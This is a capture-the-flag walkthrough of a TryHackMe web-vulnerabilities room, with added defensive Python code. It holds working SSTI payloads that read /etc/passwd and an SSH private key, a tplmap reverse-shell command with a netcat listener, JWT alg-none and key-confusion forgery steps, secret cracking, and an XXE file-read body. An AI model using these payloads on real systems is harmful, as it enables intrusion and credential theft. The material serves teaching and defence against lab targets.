This is the write-up for the room ZTH – Obscure Web Vulns on TryHackMe; it is part of the Web Fundamentals path.
Connect to the TryHackMe lab environment through the VPN, or use the AttackBox on the TryHackMe site.
The vulnerabilities that will be discussed are:
SSTI
CSRF
JWT
XXE
TASKS ZTH – Obscure Web Vulns
Task 1
Read all that is in this task and press complete
Task 2
Read all that is in this task and press complete
Task 3
Read all that is in the task and press complete
Task 4
Read all that is in the task.
4.1 How would a hacker (you 🙂) cat out /etc/passwd on the server (using cat with the RCE payload)?
Answer: {{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
4.2 What about reading in the contents of the user test's private SSH key? (Use the read-file payload, not the RCE one.)
Answer: {{''.__class__.__mro__[2].__subclasses__()[40]('/home/test/.ssh/id_rsa').read()}}
Task 5
We need to install tplmap first. I always install applications from GitHub into the /opt directory:
cd /opt
git clone https://github.com/epinna/tplmap.git
cd tplmap
python2 -m pip install -r requirements.txt
The basic syntax for tplmap differs depending on whether the vulnerable parameter is sent with GET or POST:
GET: tplmap -u <url>/?<vulnparam>
POST: tplmap -u <url> -d '<vulnparam>'
5.1 How would I cat out /etc/passwd using tplmap on the ip:port combo 10.10.10.10:5000, with the vulnerable param "noot"?
Answer: tplmap -u http://10.10.10.10:5000/ -d 'noot' --os-cmd 'cat /etc/passwd'
Task 6
Now spin up the attached machine. Let's first see if we can get a reverse shell with tplmap by having the machine call back to us.
Open a terminal and start a listener with the following command:
nc -nlvp 4444
Now we are going to use tplmap to make the server dial us. Type in the following command:
./tplmap.py -u http://10.10.76.132 -d 'name' --reverse-shell <YOUR_IP> 4444
Why the name parameter? Looking at the page source of the website, we can see the form submits a parameter called name.
We now have a reverse shell in the netcat terminal.
Now upgrade the shell to a proper TTY with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
Now go to the root and get that flag
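tplmap finds an injection point by sending template expressions (arithmetic inside {{ }}, ${ } and similar delimiters) and checking whether the response contains the evaluated result, which is exactly what the name parameter above fell for. From the defending side those probes are easy to pick out of traffic. The following is an added example, not code from the room or from tplmap: a stdlib Python scanner that parses GET query strings out of access-log lines, URL-decodes the parameter values and flags anything that looks like a template expression or a Python introspection chain. The log lines, client addresses and parameter names are constructed, and the marker patterns are a heuristic of mine, not tplmap's payload list.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Template-expression markers for the engines tplmap targets
# (Jinja2/Twig: {{ }} and {% %}, Freemarker/Velocity/EL: ${ }, ERB/JSP: <%= %>).
# Heuristic regexes written for this example, not tplmap's own payload list.
SSTI_MARKERS = [
    ("jinja2/twig expression", re.compile(r"\{\{.+?\}\}", re.S)),
    ("jinja2/twig statement", re.compile(r"\{%.+?%\}", re.S)),
    ("freemarker/velocity/el expression", re.compile(r"\$\{.+?\}", re.S)),
    ("erb/jsp expression", re.compile(r"<%=?.+?%>", re.S)),
    ("python-introspection chain", re.compile(r"__(class|mro|subclasses|globals|init|builtins)__")),
]

# Constructed Apache combined-log lines (not real traffic). Only the request line
# matters here: GET query strings are visible in the log, POST bodies are not.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?name=Bob HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512 "-" "python-requests/2.28"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /?name=%24%7B7*7%7D HTTP/1.1" 200 512 "-" "python-requests/2.28"
10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /?name=%7B%7B%27%27.__class__.__mro__%7D%7D HTTP/1.1" 200 700 "-" "python-requests/2.28"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=price%20%3C%20100 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def scan_value(value):
    """Return the names of every SSTI marker found in one decoded parameter value."""
    return [name for name, rx in SSTI_MARKERS if rx.search(value)]


def scan_params(params):
    """params: dict of already-decoded parameter name -> value (e.g. a parsed POST
    body, which is where the 'name' parameter above would arrive).
    Returns {param: [marker names]} for parameters that look like SSTI probes."""
    hits = {}
    for key, value in params.items():
        found = scan_value(value)
        if found:
            hits[key] = found
    return hits


def scan_log(log_text):
    """Pull GET query strings out of access-log lines and report suspected SSTI probes.
    Returns a list of (client_ip, param, [marker names]) tuples."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl already percent-decodes; a second unquote catches double encoding
        params = {k: unquote_plus(v) for k, v in parse_qsl(query, keep_blank_values=True)}
        for param, markers in scan_params(params).items():
            findings.append((m.group("ip"), param, markers))
    return findings


if __name__ == "__main__":
    for ip, param, markers in scan_log(SAMPLE_LOG):
        print(f"{ip} param={param!r}: {', '.join(markers)}")
```

Because the room's vulnerable parameter is sent by POST, the web server log alone will not show the payload; scan_params is the piece to hook into the application or WAF layer, where the decoded body is available. Either way, a burst of arithmetic-in-braces values from one client is a reliable sign that a template engine is being probed.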
Task 7
Terminate the machine from the previous task. Read all that is in this task and press complete
Task 8
Read all that is in this task and press complete
Task 9
Install the tool suggested in the task by using the following command
pip3 install xsrfprobe
9.1 What parameter allows us to generate a POC (actual exploit)?
Run the command on its own:
xsrfprobe
Looking through all the parameters in its help output, we find the answer.
Answer: --malicious
Task 10
Your challenge is to make a website vulnerable to CSRF, and exploit it.
You can build one yourself, but you can also use DVWA or Juice Shop.
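Whichever target you use for Task 10, the thing to take away is why the fix works: the browser attaches the victim's session cookie to a cross-site form POST automatically, and the only thing the attacker's page cannot supply is a value it cannot read. The block below is an added example, not code from the room, DVWA or Juice Shop. It is a stdlib Python synchronizer token bound to the session with HMAC, shown against a vulnerable handler that checks only the cookie and a fixed handler that also demands the token. The session id, server secret and request dictionaries are constructed stand-ins for what a web framework would hand you.

```python
import hashlib
import hmac

# Server-side secret used to derive CSRF tokens. Constructed for this example; in
# production generate it once (e.g. secrets.token_bytes(32)) and keep it out of source.
SERVER_SECRET = b"constructed-example-server-secret-do-not-reuse"

# Session store: cookie value -> username (constructed; a real app uses a DB or cache).
SESSIONS = {"sess-a1b2c3": "alice"}


def issue_csrf_token(session_id):
    """Derive a per-session token. The same session always gets the same token, so
    the server can embed it in forms and recompute it later without extra storage.
    A per-form nonce can be layered on top; binding to the session is the core."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id, presented):
    """Constant-time comparison so the check itself leaks nothing about the token."""
    if presented is None:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), presented)


def change_email_vulnerable(request):
    """Checks only the session cookie. A cross-site form POST carries that cookie
    automatically, so an attacker's page can change the victim's email."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return (401, "not logged in")
    return (200, f"email for {user} changed to {request['form']['email']}")


def change_email_fixed(request):
    """Requires the session cookie AND a matching CSRF token in the form body.
    The attacker's page cannot read the victim's token, so its forged POST fails."""
    session_id = request["cookies"].get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return (401, "not logged in")
    if not token_is_valid(session_id, request["form"].get("csrf_token")):
        return (403, "CSRF token missing or invalid")
    return (200, f"email for {user} changed to {request['form']['email']}")


def forged_request():
    """What the browser sends when the victim visits an attacker page that
    auto-submits a form: the victim's cookie, the attacker's fields, no token."""
    return {"cookies": {"session": "sess-a1b2c3"},
            "form": {"email": "attacker@example.test"}}


def legitimate_request():
    """The site's own form carries the token the server rendered for this session."""
    return {"cookies": {"session": "sess-a1b2c3"},
            "form": {"email": "alice@example.test",
                     "csrf_token": issue_csrf_token("sess-a1b2c3")}}


if __name__ == "__main__":
    print("vulnerable handler, forged request:  ", change_email_vulnerable(forged_request()))
    print("fixed handler, forged request:       ", change_email_fixed(forged_request()))
    print("fixed handler, legitimate request:   ", change_email_fixed(legitimate_request()))
```

Setting the session cookie with SameSite=Lax or Strict is a second, independent layer that stops the browser from attaching the cookie to most cross-site POSTs in the first place; the token check is still worth keeping because it does not depend on browser behaviour.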
Task 11
Read all that is in this task.
I use CyberChef for base64. Try decoding the message in this task with the From Base64 recipe:
From Base64 – CyberChef (gchq.github.io)
Press complete
Task 12
This one is hard to understand, so read it carefully and press complete when done
Task 13
Read all that is in this task and press complete
Task 14
Spin up the machine attached to this task. I must say this task is not very well explained, but let's see what we can do here.
Navigate to http://MACHINE_IP
Copy everything after JWT and paste it into CyberChef.
We can't read it. Now let's get that key, as stated in the task.
You can download it here http://MACHINE_IP/public.pem
Download it
I'm going to use a tool for this. Type in the following:
cd /opt
git clone https://github.com/Goron/TokenBreaker.git
cd TokenBreaker
python3 -m pip install -r requirements.txt
Now for the command:
python3 RsaToHmac.py -t <THE TOKEN HERE> -p /root/Downloads/public.pem
Modify Header = N
Copy the Decode Payload value and paste it in at the Enter your payload prompt.
Copy the encoded payload into the website.
Task 15
Read all that is in the task and press complete
Task 16
Read all that is in the task and press complete
Task 17
There is no tool that can check the library, get the token and make sure it is vulnerable, so you're going to have to do this manually. The header for every JWT "none" vuln, though, is the same, which can help you out. Here's the header:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
Which decodes to {"typ": "JWT", "alg": "none"}
Press complete
Task 18
This one should be fun. Spin up the machine and navigate to the site. Use the login shown in the screenshot below.
In Firefox, press F12, navigate to Storage and select Cookies.
Copy the value of the token cookie.
Now navigate to jwt.io and paste in the token.
Change user to admin and deselect secret.
Copy the purple part of the string (the payload) into Notepad and add the following in front of it:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
Now paste the whole string into the token cookie. Make sure it has a dot at the end.
Now refresh the page.
Task 19
Read all that is in this task and press complete
Task 20
Read all that is in this task and press complete
Task 21
Read all that is in this task and press complete
Task 22
Now for the fun part. Spin up the machine, start Burp Suite and navigate to http://<MACHINE_IP> in Firefox. Once the page has loaded, turn on intercept in Burp Suite.
If you do not know how to install Burp, please follow this guide.
Try creating an account, then open Burp Suite and send the request to Repeater.
Change the payload and send.
22.1 How many users are on the system?
Answer: 30
22.2 What is the name of the user with a UID of 1000?
Answer: para
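The reason the account request above is exploitable is that the server feeds the registration body straight into an XML parser that honours DOCTYPE declarations, so an injected external entity pulls /etc/passwd into the response. The block below is an added example, not the room's server code: a stdlib Python parser (xml.parsers.expat) for a registration body of that shape which refuses any DOCTYPE before the internal subset is read, so no entity, external or otherwise, can be declared. The two request bodies are constructed, and the user/username/email element names are my assumption about the form.

```python
import xml.parsers.expat


class DoctypeNotAllowed(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (and therefore could declare entities)."""


def parse_registration(xml_text):
    """Parse <user><username>..</username><email>..</email></user> into a dict.
    Entities of any kind need a DTD, so rejecting the DOCTYPE up front blocks
    external-entity file reads and entity-expansion DoS alike."""
    parser = xml.parsers.expat.ParserCreate()
    fields = {}
    text_buf = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # expat calls this before it reads the internal subset, so no entity
        # declaration is ever processed; the exception propagates out of Parse()
        raise DoctypeNotAllowed(f"DOCTYPE {name!r} is not accepted in untrusted input")

    def on_start(name, attrs):
        text_buf.clear()

    def on_text(data):
        text_buf.append(data)

    def on_end(name):
        value = "".join(text_buf).strip()
        if value:  # leaf elements only; the <user> container has no text of its own
            fields[name] = value
        text_buf.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.EndElementHandler = on_end
    parser.Parse(xml_text, True)
    return fields


def rejects_doctype(xml_text):
    """True if the parser refused the body because it carried a DOCTYPE."""
    try:
        parse_registration(xml_text)
    except DoctypeNotAllowed:
        return True
    return False


# Constructed request bodies (not captured from the room's machine).
BENIGN_BODY = "<user><username>alice</username><email>alice@example.test</email></user>"

XXE_BODY = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE user [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
    "<user><username>&ext;</username><email>x@example.test</email></user>"
)

if __name__ == "__main__":
    print("benign body parsed:", parse_registration(BENIGN_BODY))
    print("XXE body rejected: ", rejects_doctype(XXE_BODY))
```

Refusing the DOCTYPE outright is the simplest rule to audit: if the application never needs a DTD in user-supplied XML, there is no legitimate document it turns away. Where a library parser is used instead of raw expat, the equivalent is to disable DTD processing and external entity resolution in that parser's options.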
Task 23
Read all that is in the task and press complete
Task 24
Read all that is in the task and press complete
Task 25
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE" "abcdefghijklmnopqrstuwxyz" 6
Attempts: 100000
Attempts: 200000
Attempts: 300000
SECRET FOUND: pass
Time taken (sec): 13.312
Attempts: 308791
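Tasks 14, 17/18 and 25 are three failures of the same check: the verifier lets the token's header choose the algorithm (so an RSA public key gets used as an HMAC secret), it accepts alg none, or it signs with a secret short enough for jwt-cracker to find in seconds. The block below is an added example, not code from the room, jwt.io, TokenBreaker or jwt-cracker: a stdlib Python HS256 signer and verifier in which the algorithm is fixed on the server side, the header's alg is only ever compared and never used to select anything, and short secrets are refused at signing time. The secret and payloads are constructed; the alg none header it builds is the same one shown in Task 17.

```python
import base64
import hashlib
import hmac
import json


class InvalidToken(Exception):
    pass


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment):
    # JWT segments drop base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def secret_is_acceptable(secret):
    """A dictionary attack like Task 25 finds 'pass' in seconds; 32 random bytes
    (e.g. from secrets.token_bytes(32)) is a sensible floor for an HS256 key."""
    return len(secret) >= 32


def sign_hs256(payload, secret):
    """Issue a token. Refuses weak secrets rather than hoping nobody cracks them."""
    if not secret_is_acceptable(secret):
        raise ValueError("HS256 secret must be at least 32 bytes")
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_hs256(token, secret):
    """Verify with a server-fixed algorithm and key. The header's alg is checked
    for equality but never used to pick the algorithm, so alg:none and the
    RS256->HS256 confusion from Task 14 both end in InvalidToken."""
    parts = token.split(".")
    if len(parts) != 3:
        raise InvalidToken("expected header.payload.signature")
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError) as exc:
        raise InvalidToken("unreadable header") from exc
    if header.get("alg") != "HS256":
        raise InvalidToken(f"algorithm {header.get('alg')!r} not accepted")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise InvalidToken("bad signature")
    return json.loads(_b64url_decode(body_b64))


def is_accepted(token, secret):
    try:
        verify_hs256(token, secret)
        return True
    except InvalidToken:
        return False


def alg_none_token(payload):
    """The unsigned token shape from Tasks 17/18: 'none' header, payload, empty signature.
    Built here only to show the verifier rejecting it."""
    header = _b64url_encode(b'{"typ":"JWT","alg":"none"}')
    return f"{header}.{_b64url_encode(json.dumps(payload).encode())}."


# Constructed secret (not the room's); long enough to pass the length check.
SECRET = b"constructed-example-secret-0123456789abcdef"

if __name__ == "__main__":
    good = sign_hs256({"user": "guest"}, SECRET)
    print("legitimate token accepted:", is_accepted(good, SECRET))
    print("alg none token accepted:  ", is_accepted(alg_none_token({"user": "admin"}), SECRET))
    tampered = good.rsplit(".", 1)[0] + "." + _b64url_encode(b"\x00" * 32)
    print("tampered signature accepted:", is_accepted(tampered, SECRET))
    print("'pass' acceptable as secret:", secret_is_acceptable(b"pass"))
```

The same shape applies to an RS256 service: hand the verifier only the RSA public key and only the RS256 algorithm, and the RsaToHmac trick from Task 14 has nothing to work with, because the token can no longer ask to be checked as HS256. Note that a strong verifier cannot retroactively fix a weak secret; a token like the one jwt-cracker solved above still verifies against "pass", which is why the length check sits at signing time.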